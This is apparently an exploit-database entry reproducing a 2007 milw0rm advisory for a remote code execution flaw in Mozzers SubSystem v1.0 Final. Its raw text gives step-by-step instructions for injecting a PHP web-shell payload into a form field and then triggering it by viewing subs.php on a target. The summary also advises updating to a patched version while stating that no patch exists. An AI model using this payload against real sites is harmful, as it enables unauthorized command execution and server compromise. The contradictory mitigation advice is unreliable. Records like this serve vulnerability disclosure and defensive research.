header-logo
Suggest Exploit
vendor:
Mozzers SubSystem
by:
Dj7xpl
9.8
CVSS
CRITICAL
Remote Code Execution Vulnerability
Not mentioned
CWE
Product Name: Mozzers SubSystem
Affected Version From: Mozzers SubSystem v1.0 Final
Affected Version To: Mozzers SubSystem v1.0 Final
Patch Exists: No
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Mozzers SubSystem v1.0 Final

The Mozzers SubSystem v1.0 Final has a remote code execution vulnerability that allows attackers to execute arbitrary code on the affected system. This vulnerability can be exploited by sending a specially crafted request to the vulnerable application. Successful exploitation of this vulnerability can result in unauthorized access, data manipulation, or system compromise.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Mozzers SubSystem. Additionally, ensure that the application is running on a secure and up-to-date operating system.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  Mozzers SubSystem v1.0 Final                                                             +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                                                                +
+          Type........:  Remote Code Execution Vulnerability                                                      +
+          Download....:  http://sourceforge.net/projects/subsystem/                                               +
+          Page........:  http://Dj7xpl.2600.ir                                                                    +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Bug.........:                                                                                           +
+                         (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add                   +
+                         (2) Insert Bad Code Into (Sub-name) Or (Sub-url)  E.g  :<?passthru($cmd);?>              +
+                         (3) See Your Bad Code      : http://[Target]/[Path]/subs.php                             +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-18]